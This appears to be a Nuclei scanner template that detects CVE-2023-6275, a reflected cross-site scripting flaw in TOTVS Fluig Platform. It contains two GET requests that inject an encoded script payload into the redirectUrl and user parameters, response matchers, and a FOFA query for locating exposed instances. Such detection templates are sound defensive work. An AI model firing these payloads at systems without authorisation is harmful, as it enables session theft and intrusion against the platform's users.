id: CVE-2023-6275 info: name: TOTVS Fluig Platform - Cross-Site Scripting author: s4e-io severity: medium description: | A vulnerability was found in TOTVS Fluig Platform 1.6.x/1.7.x/1.8.0/1.8.1. It has been rated as problematic. Affected by this issue is some unknown functionality of the file /mobileredir/openApp.jsp of the component mobileredir. The manipulation of the argument redirectUrl/user with the input "> leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. impact: | Unauthenticated attackers can inject malicious JavaScript via reflected XSS in the redirectUrl and user parameters, potentially stealing user session cookies or redirecting users to malicious sites. remediation: | Update TOTVS Fluig Platform to a version newer than 1.8.1 that properly sanitizes user input. reference: - https://github.com/erickfernandox/CVE-2023-6275 - https://nvd.nist.gov/vuln/detail/CVE-2023-6275 - https://vuldb.com/?id.246104 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2023-6275 cwe-id: CWE-79 epss-score: 0.02379 epss-percentile: 0.81696 cpe: cpe:2.3:a:totvs:fluig:*:*:*:*:*:*:*:* metadata: verified: true max-request: 2 vendor: totvs product: fluig fofa-query: app="TOTVS-Fluig" tags: cve,cve2023,xss,fluig,vuln http: - method: GET path: - "{{BaseURL}}/mobileredir/openApp.jsp?redirectUrl=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E" - "{{BaseURL}}/mobileredir/openApp.jsp?user=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E" stop-at-first-match: true matchers-condition: and matchers: - type: word part: body words: - '">' - 'fluig://' condition: and - type: word part: content_type words: - 'text/html' - type: status status: - 200 # digest: 4a0a00473045022056b6fe344171d7d0cc4c683e379609ee64c2ba8a7bc2b83f5f26c5998e33256002210089b37a3eff6d6da8226b53418290ba6b139dcbbc288dc6c6c3f2e990a8eaadf2:922c64590222798bb761d5b6d8e72950